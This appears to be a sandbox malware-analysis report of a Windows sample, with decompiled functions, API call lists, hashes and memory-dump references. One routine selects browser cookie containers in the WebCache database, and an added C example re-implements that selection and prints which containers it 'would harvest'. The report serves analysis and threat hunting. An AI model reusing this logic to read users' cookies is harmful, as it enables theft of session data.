                                                                                                                                                  • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 00403EE6
                                                                                                                                                  • Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA
                                                                                                                                                • DeleteFileW.KERNELBASE(?), ref: 00403F17
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$DeleteFile_wcsnicmp
                                                                                                                                                • String ID: CookieEntryEx_
                                                                                                                                                • API String ID: 3258848388-47494461
                                                                                                                                                • Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                • Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
                                                                                                                                                • Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                • Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

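How the selection in E00403EAC behaves, as an added example (not code from the sample or from the report): because `_wcsnicmp(name, L"CookieEntryEx_", 0xe)` compares exactly the 14 characters of the literal, every container whose name merely starts with CookieEntryEx_, in any letter case, is handed to E00403BAF; a name without the trailing underscore or with a different prefix is skipped. The block re-implements that filter over a constructed list of container names in the style of the Containers table of the Windows WebCache (ESE) database, where names of this form are used for cookie containers. Narrow strings stand in for the sample's UTF-16, the sample data and all function names are mine, and the DeleteFileW cleanup at the end of the routine is not reproduced.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/* The literal compared by the sample; 0xe (14) is exactly its length, so
   the comparison is a prefix test, not an equality test. */
#define COOKIE_PREFIX      "CookieEntryEx_"
#define COOKIE_PREFIX_LEN  14

/* Narrow-string equivalent of _wcsnicmp(name, prefix, n) == 0: compare up
   to n characters case-insensitively, stopping early when either string
   ends (a terminator against a real character counts as a mismatch). */
static int prefix_matches_nocase(const char *name, const char *prefix, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char a = (unsigned char)name[i];
        unsigned char b = (unsigned char)prefix[i];
        if (tolower(a) != tolower(b))
            return 0;
        if (a == '\0')          /* both strings ended together */
            break;
    }
    return 1;
}

/* Mirrors the loop in E00403EAC: visit every container name and select
   those matching the prefix. Indices of selected entries are written to
   `selected` (at most max_selected of them); the return value is the
   total number that matched. */
size_t select_cookie_containers(const char *const *names, size_t count,
                                size_t *selected, size_t max_selected)
{
    size_t matched = 0;
    for (size_t i = 0; i < count; i++) {
        if (prefix_matches_nocase(names[i], COOKIE_PREFIX, COOKIE_PREFIX_LEN)) {
            if (matched < max_selected)
                selected[matched] = i;
            matched++;
        }
    }
    return matched;
}

/* Constructed sample data (not taken from any real database): container
   names in the style of the WebCache Containers table, including a
   mixed-case entry and a near miss without the trailing underscore. */
static const char *const SAMPLE_CONTAINERS[] = {
    "Content", "History", "Cookies", "CookieEntryEx_1",
    "cookieentryex_25", "CookieEntryEx", "DOMStore", "iedownload",
};
#define SAMPLE_COUNT (sizeof SAMPLE_CONTAINERS / sizeof SAMPLE_CONTAINERS[0])

/* Runs the filter over the sample data and returns how many were selected. */
size_t count_selected_in_sample(void)
{
    size_t idx[SAMPLE_COUNT];
    return select_cookie_containers(SAMPLE_CONTAINERS, SAMPLE_COUNT, idx, SAMPLE_COUNT);
}

int main(void)
{
    size_t idx[SAMPLE_COUNT];
    size_t n = select_cookie_containers(SAMPLE_CONTAINERS, SAMPLE_COUNT, idx, SAMPLE_COUNT);
    for (size_t i = 0; i < n; i++)
        printf("would harvest container %zu: %s\n", idx[i], SAMPLE_CONTAINERS[idx[i]]);
    return 0;
}
```

On the constructed list only "CookieEntryEx_1" and "cookieentryex_25" are selected; "Cookies" and "CookieEntryEx" are not, which is the behaviour a hunter should expect when checking which containers such a routine would touch.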
                                                                                                                                                C-Code - Quality: 83%
			// Instruction addresses from the report's address column are given as trailing comments.
			// Lazily allocates four global work buffers on first use. Sizes come from three
			// global parameters set here (0x413288 = 0x8000, 0x41328c = 0x100, 0x413290 = 0x1000).
			// L0040E038 is operator new (API ID ??2@ below).
			E00406785() {                                                                  // 0x00406785
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;                                                     // 0x00406785
				if(_t60 == 0) {                                                        // 0x0040678c  not yet initialised
					_t50 = 2;                                                      // 0x0040679b
					 *0x413288 = 0x8000;                                           // 0x0040679c
					_t27 = 0x8000 * _t50;                                          // 0x004067a1  0x8000 elements of 2 bytes
					 *0x41328c = 0x100;                                            // 0x004067a6
					 *0x413290 = 0x1000;                                           // 0x004067b0
					// "~(0 | _t60 > 0) | size" reads as the decompiler's rendering of the overflow
					// guard MSVC emits for operator new[]: if the multiplication overflows, the
					// requested size becomes 0xffffffff and the allocation fails instead of
					// returning an undersized buffer.
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed                   // 0x004067be
					L0040E038(); // executed                                       // 0x004067bf  operator new
					 *0x413270 = _t27;                                             // 0x004067c4  buffer 1 (pointer returned by new; the decompiler reuses the size variable's name)
					_t28 =  *0x41328c; // 0x100                                    // 0x004067c9
					_t52 = 4;                                                      // 0x004067d2
					_t29 = _t28 * _t52;                                            // 0x004067d3  0x100 elements of 4 bytes
					_push( ~(0 | _t60 > 0x00000000) | _t29);                       // 0x004067dc
					L0040E038();                                                   // 0x004067dd
					 *0x413278 = _t29;                                             // 0x004067e2  buffer 2
					_t30 =  *0x41328c; // 0x100                                    // 0x004067e7
					_t54 = 4;                                                      // 0x004067f0
					_t31 = _t30 * _t54;                                            // 0x004067f1  0x100 elements of 4 bytes
					_push( ~(0 | _t60 > 0x00000000) | _t31);                       // 0x004067fa
					L0040E038();                                                   // 0x004067fb
					 *0x41327c = _t31;                                             // 0x00406800  buffer 3
					_t32 =  *0x413290; // 0x1000                                   // 0x00406805
					_t56 = 2;                                                      // 0x0040680e
					_t33 = _t32 * _t56;                                            // 0x0040680f  0x1000 elements of 2 bytes
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed                   // 0x00406818
					L0040E038(); // executed                                       // 0x00406819
					 *0x413274 = _t33;                                             // 0x00406821  buffer 4
					return _t33;
				}                                                                      // 0x00406821
				return _t25;                                                           // 0x00406826  already initialised: nothing to do (return value is not meaningful)
			}

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                • Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
                                                                                                                                                • Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                • Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				WCHAR _v524[0x104];   /* MAX_PATH-sized buffer for the directory name (stack slot at -524) */
				WCHAR* _t12;

				_t12 = __edi;
				/* prefer the user's temp directory; fall back to the Windows directory if that fails */
				if(GetTempPathW(0x104, _v524) == 0) {
					GetWindowsDirectoryW(_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;   /* clear the first WCHAR of the output buffer */
				/* uUnique == 0: the API creates a uniquely named file <dir>\<_a4>XXXX.tmp and returns its path in _t12 */
				GetTempFileNameW(_v524, _a4, 0, _t12); // executed
				return _t12;
			}


APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00405695
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
• GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
• Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
• Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
• Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;          /* register-passed argument to the subcall; not set in this function */
				signed int _t17;     /* block size, read from the object at __esi[0x106] + 0xec */
				intOrPtr _t11;       /* one-based block index */

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				/* seek the file handle (*__esi) to block (_a8 + 1) * block_size: the second argument is the
				   low dword and the third the high dword of the 64-bit offset; the leading _push(0) and the
				   trailing 0 are dwMoveMethod (FILE_BEGIN) and lpNewFilePointer (NULL) */
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				/* the subcall wraps ReadFile (see APIs below) and reads one block of _t17 bytes into _a4 */
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}


APIs
• SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
  • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: File$PointerRead
• String ID: F@@
• API String ID: 3154509469-234039029
• Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
• Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
• Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
• Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 57%
			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;      /* return value: 1 on success, 0 on failure */
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				short* _t23;         /* output file name (wide string) */
				void* _t24;
				intOrPtr _t34;
				void* _t42;          /* output handle */
				void* _t44;
				void* _t51;
				signed int _t54;     /* item index */
				intOrPtr* _t58;      /* object whose vtable is called below (passed in __eax) */
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				/* empty file name: write to the console, otherwise open the named file */
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);   /* STD_OUTPUT_HANDLE (-11) */
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {                /* INVALID_HANDLE_VALUE: report the failure */
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					/* optionally emit a 2- or 3-byte constant from the data section before the payload */
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					/* for each of the (_t58 + 0x3c) items: fetch it, check it via vtable slot 0x30,
					   then write it via vtable slot 0x84; a failed write clears the success flag and stops */
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					/* only close handles this function opened, never the console handle */
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed (kernel32 export shared with CloseHandle)
					}
					E004052A6();
				}
				return _v8;
			}

                                                                                                                                                0x00409753
                                                                                                                                                0x00409755
                                                                                                                                                0x0040974a
                                                                                                                                                0x0040974a
                                                                                                                                                0x0040974c
                                                                                                                                                0x0040974c
                                                                                                                                                0x0040975a
                                                                                                                                                0x0040975b
                                                                                                                                                0x00409760
                                                                                                                                                0x00409763
                                                                                                                                                0x0040976a
                                                                                                                                                0x00409775
                                                                                                                                                0x0040977d
                                                                                                                                                0x0040977f
                                                                                                                                                0x00409780
                                                                                                                                                0x00409787
                                                                                                                                                0x0040978a
                                                                                                                                                0x00409792
                                                                                                                                                0x00000000
                                                                                                                                                0x00409794
                                                                                                                                                0x00409794
                                                                                                                                                0x00409799
                                                                                                                                                0x0040979e
                                                                                                                                                0x004097a7
                                                                                                                                                0x004097b1
                                                                                                                                                0x004097b7
                                                                                                                                                0x004097b9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004097a7
                                                                                                                                                0x00000000
                                                                                                                                                0x004097a9
                                                                                                                                                0x004097a9
                                                                                                                                                0x004097aa
                                                                                                                                                0x004097af
                                                                                                                                                0x004097bf
                                                                                                                                                0x004097c3
                                                                                                                                                0x004097cf
                                                                                                                                                0x004097d2
                                                                                                                                                0x004097d2
                                                                                                                                                0x004097d8
                                                                                                                                                0x004097d8
                                                                                                                                                0x004097ef

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                  • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 0040972F
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004097D2
                                                                                                                                                  • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                  • Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
                                                                                                                                                  • Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                  • Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1161345128-0
                                                                                                                                                • Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                • Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
                                                                                                                                                • Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                • Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				signed int _v16;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                				void* _t28;
                                                                                                                                                				void** _t29;
                                                                                                                                                				void* _t34;
                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                				void* _t38;
                                                                                                                                                
                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                                                				_t29 = __ecx;
                                                                                                                                                				_v8 = 0x1388;
                                                                                                                                                				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
                                                                                                                                                				_t34 = _v16;
                                                                                                                                                				if(E00404070(_t29, _t34, _a4) == 0) {
                                                                                                                                                					_t37 = 0;
                                                                                                                                                				} else {
                                                                                                                                                					_t38 = _a8;
                                                                                                                                                					if( *(_t34 + 0x24) != 1) {
                                                                                                                                                						L6:
                                                                                                                                                						__eflags =  *(_t34 + 0x24) & 0x00000004;
                                                                                                                                                						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
                                                                                                                                                							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
                                                                                                                                                							goto L4;
                                                                                                                                                						} else {
                                                                                                                                                							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
                                                                                                                                                							_t37 = _a4;
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						_t28 = E0040460C(_t30, _t29, _t34, _t38);
                                                                                                                                                						_t44 = _t28;
                                                                                                                                                						if(_t28 == 0) {
                                                                                                                                                							goto L6;
                                                                                                                                                						} else {
                                                                                                                                                							_t25 = E00404689(_t29, _t44, _t28, _t38);
                                                                                                                                                							L4:
                                                                                                                                                							_t37 = _t25;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				E00406710( &_v16);
                                                                                                                                                				return _t37;
                                                                                                                                                			}

                                                                                                                                                Instruction addresses (per line of the decompiled function above): 0x00404689, 0x0040468f, 0x00404693, 0x00404699, 0x004046ab, 0x004046b2, 0x004046ba, 0x004046c7, 0x00404725, 0x004046c9, 0x004046cd, 0x004046d0, 0x004046fa, 0x004046fa, 0x004046fe, 0x0040471e, 0x00000000, 0x00404700, 0x0040470e, 0x00404713, 0x00404716, 0x004046d2, 0x004046d5, 0x004046da, 0x004046dc, 0x00000000, 0x004046de, 0x004046e2, 0x004046e7, 0x004046e7, 0x004046e7, 0x004046dc, 0x004046d0, 0x004046ec, 0x004046f7

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                  • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                  • Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                • memcpy.MSVCRT ref: 0040470E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@FilePointermemcpy
                                                                                                                                                • String ID: F@@
                                                                                                                                                • API String ID: 402491248-234039029
                                                                                                                                                • Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                • Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
                                                                                                                                                • Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                • Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E0040BC51(intOrPtr* __edi, void* __eflags) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t10;
                                                                                                                                                				intOrPtr* _t13;
                                                                                                                                                				signed int* _t16;
                                                                                                                                                
                                                                                                                                                				_t13 = __edi;
                                                                                                                                                				_push( *((intOrPtr*)(__edi + 0x698)));
                                                                                                                                                				 *__edi = 0x410438; // executed
                                                                                                                                                				L0040E032(); // executed
                                                                                                                                                				_t11 = __edi + 0x6c4;
                                                                                                                                                				 *((intOrPtr*)(__edi + 0x6c4)) = 0x40f7b8;
                                                                                                                                                				E00403F55(_t11 + 0x54);
                                                                                                                                                				E00401357(_t11);
                                                                                                                                                				E00406355(__edi + 0x6ac);
                                                                                                                                                				_t16 = __edi + 0x694;
                                                                                                                                                				_t10 =  *_t16;
                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                					_t10 = DeleteObject(_t10);
                                                                                                                                                					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                				}
                                                                                                                                                				 *_t13 = 0x40f468;
                                                                                                                                                				return _t10;
                                                                                                                                                			}

Instruction addresses: 0x0040bc51, 0x0040bc53, 0x0040bc59, 0x0040bc5f, 0x0040bc64, 0x0040bc6e, 0x0040bc74, 0x0040bc7b, 0x0040bc86, 0x0040bc8b, 0x0040bc91, 0x0040bc95, 0x0040bc98, 0x0040bc9e, 0x0040bc9e, 0x0040bca2, 0x0040bca9

                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BC5F
                                                                                                                                                  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                  • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040BC98
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$??3@DeleteObject
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2012871476-0
                                                                                                                                                • Opcode ID: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                • Instruction ID: 0aef1c026dc6713788bae9d6eb068f8a37dce8dfc4f8d72ecede120d92fabf63
                                                                                                                                                • Opcode Fuzzy Hash: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                • Instruction Fuzzy Hash: A8F0E5711002129FDB20BF35D8806C1B7E8FF41314F10403AE85977581CB79B478CA99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040536A(void* _a4, void* _a8) {
                                                                                                                                                				long _v8;
                                                                                                                                                				int _t8;
                                                                                                                                                
                                                                                                                                                				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
                                                                                                                                                				return _t8;
                                                                                                                                                			}

Instruction addresses: 0x00405386, 0x0040538d

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 00405377
                                                                                                                                                • WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWritewcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3657313286-0
                                                                                                                                                • Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                • Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
                                                                                                                                                • Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                • Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                			E00406729(signed int __edi, signed int* __esi) {
                                                                                                                                                				signed int _t4;
                                                                                                                                                				signed int _t9;
                                                                                                                                                				signed int* _t10;
                                                                                                                                                
                                                                                                                                                				_t10 = __esi;
                                                                                                                                                				_t9 = __edi;
                                                                                                                                                				_t4 =  *__esi;
                                                                                                                                                				if(_t4 != 0) {
                                                                                                                                                					_push(_t4);
                                                                                                                                                					L0040E032();
                                                                                                                                                					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                					__esi[1] = __esi[1] & 0x00000000;
                                                                                                                                                				}
                                                                                                                                                				_push(_t9); // executed
                                                                                                                                                				L0040E038(); // executed
                                                                                                                                                				 *_t10 = _t4;
                                                                                                                                                				_t10[1] = _t9;
                                                                                                                                                				return 1;
                                                                                                                                                			}

